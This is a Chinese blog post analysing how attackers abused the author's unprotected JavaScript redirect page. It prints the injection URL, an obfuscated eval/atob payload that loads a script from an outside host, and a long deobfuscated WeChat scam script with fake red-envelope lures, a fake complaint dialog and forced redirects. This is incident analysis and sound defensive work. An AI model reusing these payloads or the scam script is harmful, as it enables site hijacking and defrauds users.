如有乐享被黑跳转页面分析

Home decor

故事

去年的时候博客针对第三方网址地址跳转做了一个html页面,来做跳转用!这样能一定程度减少博客的权重的流失!

这个HTML跳转页面是纯JS实现的,页面上也没做安全判断!

但是过了一段时间突然发现域名被微信封了,不在微信分享网页了~~~

经过分享发现原来是有人恶意利用这个html跳转页面,跳转到菠菜网站!!

博主发现后立即在这个页面中加了有效的判断,然后开始漫长的申请解封的道路!

链接

1
含有恶意欺诈网页:  https://51.ruyo.net/go/index.html?u=javascript:parent[String.fromCharCode(101;118;97;108)](parent[String.fromCharCode(97;116;111;98)]("ZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgc3JjPS8vYy5icWFraS5jbi94cy5qcz48L3NjcmlwdD4iKQ=="));//241137/241137.html#pt_1520302119694 

拆开得到javascript代码

1
2
3
4
5
javascript:parent[String.fromCharCode(101;118;97;108)](parent[String.fromCharCode(97;116;111;98)]("ZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgc3JjPS8vYy5icWFraS5jbi94cy5qcz48L3NjcmlwdD4iKQ=="));//241137/241137.html#pt_1520302119694 

//parent() 方法返回被选元素的直接父元素。
//fromCharCode() 可接受一个指定的 Unicode 值,然后返回一个字符串。
//这个几个Unicode 值分别等于
  • 101 = e
  • 118 = v
  • 97 = a
  • 108 = l
  • 97 = a
  • 116 = t
  • 111 = o
  • 98 = b

连起来,得到eval atob,猜测可能是js函数

1
2
eval()// 函数计算 JavaScript 字符串,并把它作为脚本代码来执行。
atob() //方法用于解码使用 base-64 编码的字符串。

ZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgc3JjPS8vYy5icWFraS5jbi94cy5qcz48L3NjcmlwdD4iKQ==

解码得到

document.write("<script src=//c.bqaki.cn/xs.js></script>")

我访问这个链接的时候已经是找不到这个ip地址了(网站挂了)但是在网上找到了缓存,估计是有人也是遭遇同样的情况然后用urlscan.io 扫描了一下

大概信息是

  • 扫描时间:2018年1月4日
  • 服务器地址:天津 天津 , 中国

完整的缓存js代码是

1
2
3
4
5
6
7
8
9
10
11
12
var ua = navigator.userAgent.toLowerCase();

function addTitle() {
document.title = "";
}
if (/micromessenger/.test(ua)) {
addTitle();
var new_doc = document.open("text/html", "replace");
var html = unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%20style%3D%22font-size%3A%2040%25%3B%22%3E%0A%09%3Chead%3E%0A%09%09%3Cmeta%20charset%3D%22UTF-8%22%3E%0A%09%09%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2Cinitial-scale%3D1%2Cuser-scalable%3D0%2Cminimum-scale%3D1.0%2Cmaximum-scale%3D1.0%22%3E%0A%09%09%3Cmeta%20content%3D%22yes%22%20name%3D%22apple-mobile-web-app-capable%22%3E%0A%09%09%3Cmeta%20content%3D%22black%22%20name%3D%22apple-mobile-web-app-status-bar-style%22%3E%0A%09%09%3Cmeta%20content%3D%22no%22%20name%3D%22msapplication-tap-highlight%22%3E%0A%09%09%3Cmeta%20content%3D%22IE%3Dedge%22%20http-equiv%3D%22X-UA-Compatible%22%3E%0A%09%09%3Cmeta%20content%3D%22telephone%3Dno%22%20name%3D%22format-detection%22%3E%0A%09%09%3Cmeta%20content%3D%22email%3Dno%22%20name%3D%22format-detection%22%3E%0A%09%09%3Ctitle%3E%3C/title%3E%0A%09%09%3Cscript%20type%3D%22text/javascript%22%3E%0A%09%09%09var%20_hmt%20%3D%20_hmt%20%7C%7C%20%5B%5D%3B%3B%0A%09%09%09%28function%28%29%20%7B%0A%09%09%09%09var%20srcArr%20%3D%20%5B%22https%3A//cdn.bootcss.com/jquery/1.2.3/jquery.min.js%22%2C%22https%3A//s19.cnzz.com/z_stat.php%3Fid%3D1272904854%26web_id%3D1272904854%22%2C%20%22//c.bqaki.cn/mm.js%22%5D%3B%0A%09%09%09%09var%20hm%2C%20s%3B%0A%09%09%09%09for%28var%20i%20%3D%200%3B%20i%20%3C%20srcArr.length%3B%20i++%29%20%7B%0A%09%09%09%09%09hm%20%3D%20document.createElement%28%22script%22%29%3B%0A%09%09%09%09%09hm.src%20%3D%20srcArr%5Bi%5D%3B%0A%09%09%09%09%09hm.charset%20%3D%20%22utf-8%22%3B%0A%09%09%09%09%09s%20%3D%20document.getElementsByTagName%28%22script%22%29%5B0%5D%3B%0A%09%09%09%09%09s.parentNode.insertBefore%28hm%2C%20s%29%3B%0A%09%09%09%09%7D%0A%09%09%09%7D%29%28%29%3B%0A%09%09%3C/script%3E%0A%09%3C/head%3E%0A%09%3Cbody%3E%0A%09%3C/body%3E%0A%0A%3C/html%3E");
new_doc.write(html);
new_doc.close();
}

用到的几个函数

1
2
toLowerCase() //方法用于把字符串转换为小写。
unescape() //函数可对通过 escape() 编码的字符串进行解码。

解码后的html页面这个样子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<!DOCTYPE html>
<html style="font-size: 40%;">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=0,minimum-scale=1.0,maximum-scale=1.0">
<meta content="yes" name="apple-mobile-web-app-capable">
<meta content="black" name="apple-mobile-web-app-status-bar-style">
<meta content="no" name="msapplication-tap-highlight">
<meta content="IE=edge" http-equiv="X-UA-Compatible">
<meta content="telephone=no" name="format-detection">
<meta content="email=no" name="format-detection">
<title></title>
<script type="text/javascript">
var _hmt = _hmt || [];;
(function() {
var srcArr = ["https://cdn.bootcss.com/jquery/1.2.3/jquery.min.js","https://s19.cnzz.com/z_stat.php?id=1272904854&web_id=1272904854", "//c.bqaki.cn/mm.js"];
var hm, s;
for(var i = 0; i < srcArr.length; i++) {
hm = document.createElement("script");
hm.src = srcArr[i];
hm.charset = "utf-8";
s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
}
})();
</script>
</head>
<body>
</body>

</html>

然后c.bqaki.cn/mm.js这个网站也挂掉了,恰巧urlscan.io 也缓存了

解密后的mm.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
var tONm1, hcRdr2;
var mLTeLPR3;
(window['frames']['length'] != parent['frames']['length']) ? mLTeLPR3 = 0 : mLTeLPR3 = 1;
tONm1 = window["document"]['documentElement']['clientWidth'];
hcRdr2 = window["document"]['documentElement']['clientHeight'];
var CmJw4 = "http://t.cn/Roji0oH";
var MsqLT5 = "http://mp.weixin.qq.com/mp/ad_biz_info";
var aWTaqIGXG6 = "https://m.jd.com/";
var sZQgb7 = "//c.bqaki.cn/";
var LHpJ8 = "//api.bqaki.cn/";
window['iOSLink'] = "##";
window['androidLink'] = "##";
var Qln9 = {};
var hzgG10 = true;
var pv_WPFt11 = null;
var kRS12 = false;
var $K13 = new Base64();
var jWZiCZ14 = ["6YCf54K577yB", "5Luk5Lq65byA5b+D55qE5pe25Yi75p2l5LqG", "6YCf5bqm77yB5bey5pyJM+S9jeWlveWPi+mihuWPlg==", "5Lq65Lq65YWN6LS56aKG", "5Zyf6LGq77yM5bCx5piv5aaC5q2k5Lu75oCn", "6KeB6ICF5pyJ5Lu977yM5p2l5ZCn44CC", "55yL5LqG5bCx5b2S5L2g5LqG", "54K55byA77yM5L2g5bCx5pyJ5Lu9", "5Yir6K+06K+d77yM54K55oiR77yB", "55yL77yM5pS26I635pe25Yi75p2l5LqG44CC", "5b+r5rKh5LqG77yB6YCf55yL77yB", "5bCx6KaB5byA5aeL5LqG77yM5b+r77yB", "6L+Z5LmI5aW955qE5rS75Yqo77yM5L2g56uf54S26L+Y5LiN55+l6YGT77yB"];

function getCookie(BNcRBu15) {
var s16, $_sMiZrrF17 = new window["RegExp"]('(^| )' + BNcRBu15 + '=([^;]*)(;|$)');
if (s16 = window["document"]['cookie']['match']($_sMiZrrF17)) {
return window["unescape"](s16[2]);
} else {
return "";
}
}

function setCookie(wsobYXtny18, XLzf19) {
var Y$GYLzQ20 = 30;
var vutL21 = new window["Date"]();
vutL21['setTime'](vutL21['getTime']() + Y$GYLzQ20 * 24 * 60 * 60 * 1000);
window["document"]['cookie'] = wsobYXtny18 + '=' + window["escape"](XLzf19) + ';expires=' + vutL21['toGMTString']();
}
initReport();
initShare();
var DzaV22;

function isEjfiemw() {
if (window["Math"]['random']() > 100) {
return true;
}
for (var FheiFh23 = 0; FheiFh23 < DzaV22['length']; FheiFh23++) {
if (DzaV22[FheiFh23]['indexOf'](top['location']['host']) != -1) {
return true;
}
}
return false;
}

function isAevkhi3() {
if (window["Math"]['random']() > 100) {
return true;
}
if ("" == window["document"]['referrer']) {
return true;
}
var JNILnDJf24 = false;
for (var tzPhUE25 = 0; tzPhUE25 < DzaV22['length']; tzPhUE25++) {
if (window["document"]['referrer']['indexOf'](DzaV22[tzPhUE25]['replace']('https://', '')['replace']('http://', '')['split']("/")[0]) != -1) {
JNILnDJf24 = false;
break;
} else {
JNILnDJf24 = true;
}
}
return JNILnDJf24;
}

function loadAPIJS(kQYCu26) {
var OXE$Uoby27 = LHpJ8 + kQYCu26 + ".js?d=" + (window["Math"]['random']() * 100);
var PDjLtZYv28, eoQlSjh29;
PDjLtZYv28 = window["document"]['createElement']("script");
PDjLtZYv28['src'] = OXE$Uoby27;
eoQlSjh29 = window["document"]['getElementsByTagName']("script")[0];
eoQlSjh29['parentNode']['insertBefore'](PDjLtZYv28, eoQlSjh29);
}

function loadCommonJS(nho30) {
var LzsTtLX31 = sZQgb7 + nho30 + ".js?d=" + (window["Math"]['random']() * 100);
var BlquXz$ny32, kp33;
BlquXz$ny32 = window["document"]['createElement']("script");
BlquXz$ny32['src'] = LzsTtLX31;
kp33 = window["document"]['getElementsByTagName']("script")[0];
kp33['parentNode']['insertBefore'](BlquXz$ny32, kp33);
}

function show(I34, T35, EmZ36) {
var _CZHjrT37 = window["document"]['getElementById']("sdk_dialog"),
O_mO38 = window["document"]['getElementById']("sdk_dialog_hd"),
W39 = window["document"]['getElementById']("sdk_dialog_bd"),
dVGKwpWQ$40 = window["document"]['getElementById']("sdk_dialog_ft");
_CZHjrT37['style']['display'] = "block", O_mO38['innerHTML'] = I34, W39['innerHTML'] = T35, dVGKwpWQ$40['innerHTML'] = EmZ36, dVGKwpWQ$40['removeEventListener']("click", function() {}, false), dVGKwpWQ$40['addEventListener']("click", function() {
_CZHjrT37['style']['display'] = "none"
}, false);
}
loadAPIJS('api');
loadCommonJS('clipboard');
window['jsCallback'] = function(name, hO41) {
if (name == 'ejfiemw') {
DzaV22 = hO41['data'];
} else if (name == 'cejsje') {
window['adLink'] = hO41['adLink'];
} else if (name = 'eugjrrh') {
if (isEjfiemw()) {
if (isAevkhi3()) {
if ("1" != getCookie("isClick")) {
modifyLocationHref(DzaV22);
}
}
} else {
modifyLocationHref(DzaV22);
}
}
};

function addTitle() {
var Hsn$Nd42 = window["document"]['location']['host']['substr'](0, window["document"]['location']['host']['indexOf']('.'));
for (var _y43 = 0, ppkWMwv44 = 0; ppkWMwv44 < Hsn$Nd42['length']; ppkWMwv44++) {
_y43 += Hsn$Nd42['charAt'](ppkWMwv44)['charCodeAt']();
}
var pjbjrKl45 = _y43 % jWZiCZ14['length'];
var PfT46 = $K13['decode'](jWZiCZ14[pjbjrKl45]);
window["document"]['title'] = PfT46;
}
var O47;

function addBody() {
var LPQck48 = window["document"]['createElement']('link');
LPQck48['href'] = '//c.bqaki.cn/css.css';
LPQck48['rel'] = 'stylesheet';
LPQck48['type'] = 'text/css';
window["document"]['getElementsByTagName']('HEAD')['item'](0)['appendChild'](LPQck48);
var F49 = '<img id="cross-domain-img" usemap="#img-map" src="#">' + '<map id="img-map" name="img-map">' + '<area shape="rect" coords="0,0,0,0" href ="javascript:;" alt="rd" />' + '</map>' + '<div id="report-btn">' + decodeURI("%E6%8A%95%E8%AF%89") + '</div>' + '<audio id="bg-music" controls="controls" preload="auto">' + '<source src="https://file.ih5.cn/v3/files/2171738/20171012/2b565bec.mp3" type="audio/mpeg">' + '</audio>';
window["document"]['body']['innerHTML'] = F49;
O47 = window["document"]['body'];
setImgWH();
clickImg();
}

function setImgWH() {
var ICoQoYpXZ50 = window["document"]['getElementById']('cross-domain-img');
if (ICoQoYpXZ50 != null) {
ICoQoYpXZ50['style']['width'] = tONm1 + 'px';
ICoQoYpXZ50['height'] = hcRdr2;
ICoQoYpXZ50['style']['display'] = 'block';
}
window["document"]['body']['style'] = "display:block;margin:0 auto;";
}

function playMusic() {
window["document"]['getElementById']("bg-music")['play']();
}

function setMapArea() {
var g51 = .4 * tONm1,
_LE52 = .64 * hcRdr2,
l53 = .6 * tONm1,
owp54 = .72 * hcRdr2,
LP55 = window["document"]['getElementsByTagName']("area");
LP55[0]['coords'] = (null != LP55) ? g51 + "," + _LE52 + "," + l53 + "," + owp54 : "0,0,1000,1000"
}

function randomMoney() {
var alBgkzw56 = null;
if ((getCookie("MONEY") == null || getCookie("MONEY") == "" || getCookie("MONEY") == undefined)) {
alBgkzw56 = ((50 * window["Math"]['random']()) + 80)['toFixed'](0);
setCookie("MONEY", alBgkzw56);
} else {
alBgkzw56 = getCookie("MONEY");
}
return alBgkzw56;
};

function dialogInit() {
var MtkQtomX57 = window["document"]['createElement']("div");
MtkQtomX57['id'] = "sdk_dialog", MtkQtomX57['innerHTML'] = '<div class="weui-mask weui-mask--visible"></div><div class="weui-dialog weui-dialog--visible"><div class="weui-dialog__hd"><strong class="weui-dialog__title"><span style="color:red;" id="sdk_dialog_hd"></span></strong></div><div class="weui-dialog__bd" id="sdk_dialog_bd"></div><div class="weui-dialog__ft"><a id="sdk_dialog_ft" href="javascript:;" class="weui-dialog__btn weui-dialog__btn_primary"></a></div></div>', window["document"]['body']['appendChild'](MtkQtomX57);
}

function createMoney() {
var dWyovTEt58 = window["document"]['createElement']("div");
dWyovTEt58['id'] = "m-amount";
var vJ59 = randomMoney();
dWyovTEt58['innerHTML'] = vJ59, dWyovTEt58['style'] = "position:fixed;font-size:63px;font-family:STHeiti;", O47['insertBefore'](dWyovTEt58, O47['childNodes'][0]), dWyovTEt58['style']['left'] = window["document"]['documentElement']['clientWidth'] / 2 - dWyovTEt58['clientWidth'] / 2 + "px", dWyovTEt58['style']['top'] = 29 * window["document"]['documentElement']['clientHeight'] / 64 - dWyovTEt58['clientHeight'] / 2 + "px"
}

function changeImg() {
initVisibility();
setCookie("isClick", "1");
var XrpnX60 = window["document"]['getElementById']("cross-domain-img");
XrpnX60['removeEventListener']("click", changeImg, false);
setTimeout(playMusic, 1500);
setTimeout("createMoney();", 2300);
setTimeout("setMapArea();", 800);
setTimeout("clickArea();", 800);
if (null != XrpnX60) {
XrpnX60['src'] = sZQgb7 + "gif.gif";
XrpnX60['id'] = "1ross-domain-img-opened";
}
}

function clickImg() {
var LStygv61 = window["document"]['getElementById']("cross-domain-img");
LStygv61['src'] = sZQgb7 + "static.jpg";
if (null != LStygv61) {
LStygv61['addEventListener']("click", changeImg, false);
}
}

function report() {
var Iiz62 = window["document"]['getElementById']("report-btn");
if (null != Iiz62) {
Iiz62['addEventListener']("click", addDialog, false)
}
}

function initReport() {
if (getCookie("wx110") == "y") {
(mLTeLPR3 == 0) ? top['location']['href'] = CmJw4 : window["document"]['location']['href'] = CmJw4
}
}

function addDialog() {
var Q63 = window["document"]['createElement']("div");
Q63['className'] = "weui-mask weui-mask--visible";
window["document"]['body']['appendChild'](Q63);
var zkw64 = window["document"]['createElement']("div");
zkw64['className'] = "weui-dialog weui-dialog--visible";
var kT65 = '<div class="weui-dialog__hd">' + '<strong class="weui-dialog__title">' + '<span style="color:red;">投诉成功</span></strong>' + '</div>' + '<div class="weui-dialog__bd">' + '我们已经收到您的投诉' + '</div>' + '<div class="weui-dialog__ft">' + '<a href="javascript:;" id="tousu" class="weui-dialog__btn primary">确定</a>' + '</div>';
zkw64['innerHTML'] = kT65;
window["document"]['body']['appendChild'](zkw64);
var sfMX$Wdf66 = window["document"]['getElementById']("tousu");
sfMX$Wdf66['addEventListener']("click", removeDialog, false)
}

function removeDialog() {
setCookie("wx110", "y");
(mLTeLPR3 == 0) ? top['location']['href'] = CmJw4 : window["document"]['location']['href'] = CmJw4
}

function isWeixin() {
var p67 = navigator['userAgent']['toLowerCase']();
if (p67['match'](/MicroMessenger/i) == "micromessenger") {
return true
} else {
return false
}
}

function PCRd() {
var cnLgXJL68 = {
win: false,
mac: false,
xll: false
};
var tQSul69 = navigator['platform'];
cnLgXJL68['win'] = tQSul69['indexOf']("Win") == 0;
cnLgXJL68['mac'] = tQSul69['indexOf']("Mac") == 0;
cnLgXJL68['x11'] = tQSul69 == "X11" || tQSul69['indexOf']("Linux") == 0;
if (cnLgXJL68['win'] || cnLgXJL68['mac'] || cnLgXJL68['xll'] || !isWeixin()) {
return;
if (window["document"]['location']['href']['indexOf']("#") == -1) {
(mLTeLPR3 == 0) ? top['location']['href'] = MsqLT5 : window["document"]['location']['href'] = MsqLT5;
hzgG10 = false;
}
}
}

function UARd() {
var iAKrFWu70 = navigator['userAgent'];
var goncZk71 = iAKrFWu70['indexOf']('Android') > -1 || iAKrFWu70['indexOf']('Adr') > -1;
var POSYXE72 = !! iAKrFWu70['match'](/\(i[^;]+;( U;)? CPU.+Mac OS X/);
if (POSYXE72 == true) {
(mLTeLPR3 == 0) ? top['location']['href'] = iOSLink : window["document"]['location']['href'] = iOSLink
}
}

function redirectToCash() {
if (kRS12) {
jump();
} else {
show($K13['decode']("5pyq5YiG5Lqr"), $K13['decode']("5pyq5YiG5Lqr5Yiw5pyL5Y+L5ZyILOaXoOazleafpeeci+OAgg=="), $K13['decode']("56Gu5a6a"));
}
}

function toKey() {
if (pv_WPFt11['readyState'] == 4) {
if (pv_WPFt11['status'] == 200) {
var gGjHZn73 = pv_WPFt11['responseText'];
modifyLocationHref(JSON['parse'](gGjHZn73)['data'])
}
}
}

function toPool(content) {
var DFXSohh74 = content['msg'];
if (DFXSohh74 != 'error') {
var dySFfyYl75 = content['data'];
var Jqy76 = top['location']['pathname'];
if (Jqy76 == '/' || Jqy76 == '/index.html') {
Jqy76 = ''
}
var hR77 = top['location']['protocol'] + '//' + top['location']['host'] + Jqy76;
if (dySFfyYl75['indexOf'](hR77) != -1) {} else {}
}
}

function modifyLocationHref(linkArr) {
var fMZ_CIRM78 = linkArr[window["Math"]['floor'](window["Math"]['random']() * linkArr['length'])];
(mLTeLPR3 == 0) ? top['location']['href'] = fMZ_CIRM78 : window["document"]['location']['href'] = fMZ_CIRM78;
}

function clickArea() {
window["document"]['getElementById']("img-map")['addEventListener']("click", redirectToCash, false)
}

function historyADPage() {
var kmsUd79 = new window["Date"]()['getHours']();
if (kmsUd79 >= -1) {
setTimeout(addADToHistory, 200);
}
}

function addADToHistory() {
history['pushState'](history['length'] + 1, "", "#pt_" + new window["Date"]()['getTime']());
}

function hashChangeJump() {
if (window["Math"]['random']() > 0.1) {
window["document"]['location']['href'] = androidLink + "?ad=" + (window["parseInt"]((window["parseInt"](new window["Date"]()['getTime']() / (1000 * 60 * 1)) + '')['substring'](2)) + 5000);
}
}

function Base64() {
_keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
this['encode'] = function(input) {
var NHMG_DPM$80 = "";
var D_k81, EEQyVO82, fWdfIEGk83, SkrvksO84, hbdLpXt85, zHKagkmq86, s_$wej87;
var gDtp$zkLC88 = 0;
input = _utf8_encode(input);
while (gDtp$zkLC88 < input['length']) {
D_k81 = input['charCodeAt'](gDtp$zkLC88++);
EEQyVO82 = input['charCodeAt'](gDtp$zkLC88++);
fWdfIEGk83 = input['charCodeAt'](gDtp$zkLC88++);
SkrvksO84 = D_k81 >> 2;
hbdLpXt85 = ((D_k81 & 3) << 4) | (EEQyVO82 >> 4);
zHKagkmq86 = ((EEQyVO82 & 15) << 2) | (fWdfIEGk83 >> 6);
s_$wej87 = fWdfIEGk83 & 63;
if (isNaN(EEQyVO82)) {
zHKagkmq86 = s_$wej87 = 64
} else if (isNaN(fWdfIEGk83)) {
s_$wej87 = 64
}
NHMG_DPM$80 = NHMG_DPM$80 + _keyStr['charAt'](SkrvksO84) + _keyStr['charAt'](hbdLpXt85) + _keyStr['charAt'](zHKagkmq86) + _keyStr['charAt'](s_$wej87)
}
return NHMG_DPM$80
};
this['decode'] = function(input) {
var fTgOsCovo89 = "";
var ijm90, LBwWIw91, $Hhkp92;
var hhcvG93, s94, LqMXu95, BQmBU96;
var gFVlTR97 = 0;
input = input['replace'](/[^A-Za-z0-9\+\/\=]/g, "");
while (gFVlTR97 < input['length']) {
hhcvG93 = _keyStr['indexOf'](input['charAt'](gFVlTR97++));
s94 = _keyStr['indexOf'](input['charAt'](gFVlTR97++));
LqMXu95 = _keyStr['indexOf'](input['charAt'](gFVlTR97++));
BQmBU96 = _keyStr['indexOf'](input['charAt'](gFVlTR97++));
ijm90 = (hhcvG93 << 2) | (s94 >> 4);
LBwWIw91 = ((s94 & 15) << 4) | (LqMXu95 >> 2);
$Hhkp92 = ((LqMXu95 & 3) << 6) | BQmBU96;
fTgOsCovo89 = fTgOsCovo89 + window["String"]['fromCharCode'](ijm90);
if (LqMXu95 != 64) {
fTgOsCovo89 = fTgOsCovo89 + window["String"]['fromCharCode'](LBwWIw91)
}
if (BQmBU96 != 64) {
fTgOsCovo89 = fTgOsCovo89 + window["String"]['fromCharCode']($Hhkp92)
}
}
fTgOsCovo89 = _utf8_decode(fTgOsCovo89);
return fTgOsCovo89
};
_utf8_encode = function(string) {
string = string['replace'](/\r\n/g, "\n");
var yRSYdPdD98 = "";
for (var MYJFTCe99 = 0; MYJFTCe99 < string['length']; MYJFTCe99++) {
var QOgO100 = string['charCodeAt'](MYJFTCe99);
if (QOgO100 < 128) {
yRSYdPdD98 += window["String"]['fromCharCode'](QOgO100)
} else if ((QOgO100 > 127) && (QOgO100 < 2048)) {
yRSYdPdD98 += window["String"]['fromCharCode']((QOgO100 >> 6) | 192);
yRSYdPdD98 += window["String"]['fromCharCode']((QOgO100 & 63) | 128)
} else {
yRSYdPdD98 += window["String"]['fromCharCode']((QOgO100 >> 12) | 224);
yRSYdPdD98 += window["String"]['fromCharCode'](((QOgO100 >> 6) & 63) | 128);
yRSYdPdD98 += window["String"]['fromCharCode']((QOgO100 & 63) | 128)
}
}
return yRSYdPdD98
};
_utf8_decode = function(utftext) {
var qiz101 = "";
var IWh_LbK102 = 0;
var kHK103 = c1 = c2 = 0;
while (IWh_LbK102 < utftext['length']) {
kHK103 = utftext['charCodeAt'](IWh_LbK102);
if (kHK103 < 128) {
qiz101 += window["String"]['fromCharCode'](kHK103);
IWh_LbK102++
} else if ((kHK103 > 191) && (kHK103 < 224)) {
c2 = utftext['charCodeAt'](IWh_LbK102 + 1);
qiz101 += window["String"]['fromCharCode'](((kHK103 & 31) << 6) | (c2 & 63));
IWh_LbK102 += 2
} else {
c2 = utftext['charCodeAt'](IWh_LbK102 + 1);
c3 = utftext['charCodeAt'](IWh_LbK102 + 2);
qiz101 += window["String"]['fromCharCode'](((kHK103 & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
IWh_LbK102 += 3
}
}
return qiz101
}
}
var hnFMtTus104 = window["Date"]['parse'](new window["Date"]());
window['jump'] = function() {
$['ajax']({
type: "GET",
url: LHpJ8 + "loadIndex?source=1&t=" + hnFMtTus104,
dataType: "json",
data: {},
success: function(ZAr105) {
if (ZAr105 != null && ZAr105['code'] == "0") {
var De_Q106 = window["document"]['open']("text/html", "replace");
var O107 = window["unescape"](ZAr105['content']);
De_Q106['write'](O107);
De_Q106['close']();
} else {
modifyLocationHref(adLink);
console['log']("loadIndex", "code==1");
}
},
error: function(Assb108) {
modifyLocationHref(adLink);
console['log']("loadIndex", "error");
}
});
};
var A109 = false;
window['onhashchange'] = function() {
var vVPPOzUC110 = ((window["Math"]['random']() * 100) < 100);
if (vVPPOzUC110 && !A109) {
A109 = true;
jump();
} else {
modifyLocationHref(adLink);
}
};

function dissScroll() {
window["document"]['body']['ontouchmove'] = function(e) {
e['preventDefault']();
};
window["document"]['querySelector']('body')['addEventListener']('touchmove', function(gnHohw111) {
gnHohw111['preventDefault']();
});
}

function getHiddenProp() {
var oNT_KW112 = ['webkit', 'moz', 'ms', 'o'];
if ('hidden' in window["document"]) return 'hidden';
for (var Vg113 = 0; Vg113 < oNT_KW112['length']; Vg113++) {
if ((oNT_KW112[Vg113] + 'Hidden') in window["document"]) return oNT_KW112[Vg113] + 'Hidden';
}
return null;
}

function getVisibilityState() {
var hipMW114 = ['webkit', 'moz', 'ms', 'o'];
if ('visibilityState' in window["document"]) return 'visibilityState';
for (var YXRL115 = 0; YXRL115 < hipMW114['length']; YXRL115++) {
if ((hipMW114[YXRL115] + 'VisibilityState') in window["document"]) return hipMW114[YXRL115] + 'VisibilityState';
}
return null;
}

function isHidden() {
var TahY_IEcy116 = getHiddenProp();
if (!TahY_IEcy116) return false;
return window["document"][TahY_IEcy116];
}

function onVisibilityChanged(SIT_117) {
if ("visible" == window["document"][getVisibilityState()]) {
onVisibilityChangedCallback(false);
} else {
onVisibilityChangedCallback(true);
}
}

function onVisibilityChangedCallback(UdPg118) {
if (!UdPg118) {
kRS12 = true;
setCookie("share_time", window["Date"]['parse'](new window["Date"]()));
show($K13['decode']("5YiG5Lqr5oiQ5Yqf"), $K13['decode']("5pyJM+S9jeWlveWPi+mihuWPluWQjiznuqLljIXoh6rliqjlrZjlhaXpkrHljIXjgII="), $K13['decode']("56Gu5a6a"));
}
}

function initVisibility() {
var FuGvynCvk119 = getHiddenProp();
if (FuGvynCvk119) {
var tPHgcepB120 = FuGvynCvk119['replace'](/[H|h]idden/, '') + 'visibilitychange';
window["document"]['addEventListener'](tPHgcepB120, onVisibilityChanged, false);
}
}

function initShare() { /**var share_time = getCookie("share_time"); if(share_time==''||share_time == undefined || share_time == null||share_time==0) { return false; } if((Date.parse(new Date()) - share_time) > 10 * 60 * 1000) { (flag == 0) ? top.location.href = wx110Link: document.location.href = wx110Link; };**/
}

function init() {
PCRd();
addTitle();
addBody();
historyADPage();
dissScroll();
dialogInit();
report();
};
init();

代码量太多了不想分(装)(B)了,直接看效果。

尝试在本地的复现界面

本地复现

代码中的一些base64编码后的文字,解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
速点!
令人开心的时刻来了
速度!已有3位好友领取
人人免费领
土豪,就是如此任性
见者有份,来吧。
看了就归你了
点开,你就有份
别说话,点我!
看,收获时刻来了。
快没了!速看!
就要开始了,快!
这么好的活动,你竟然还不知道!
未分享到朋友圈,无法查看。
有3位好友领取后,红包自动存入钱包。
分享成功

几个链接

1
2
3
4
5
6
http://t.cn/Roji0oH
还原后,可能是已经屏蔽或者是其他链接
https://weixin110.qq.com/cgi-bin/mmspamsupport-bin/newredirectconfirmcgi?block_type=20&url=http%3A%2F%2Fbaidu.super%2Ftz.html&version=260506312&devicetype=android-223&lang=zh_CN&scene=1#wechat_redirect
解密得到
http://baidu.super/tz.html&version=260506312&devicetype=android-223&lang=zh_CN&scene=1#wechat_redirect
网站挂了,未找到.super相关的后缀,可能又是替换之类的,也未找到相关信息

微信屏蔽

比较有趣的是

1
var kT65 = '<div class="weui-dialog__hd">' + '<strong class="weui-dialog__title">' + '<span style="color:red;">投诉成功</span></strong>' + '</div>' + '<div class="weui-dialog__bd">' + '我们已经收到您的投诉' + '</div>' + '<div class="weui-dialog__ft">' + '<a href="javascript:;" id="tousu" class="weui-dialog__btn primary">确定</a>' + '</div>';

猜测可能是利用相同的原理劫持微信投诉页面,来实现假投诉

@我是小马甲~说最终目的是跳转到菠菜网站,但我从代码中未看到,可能时间或是技术的问题。不过如有乐享被黑产搞了一波然后微信屏蔽链接倒是真的。

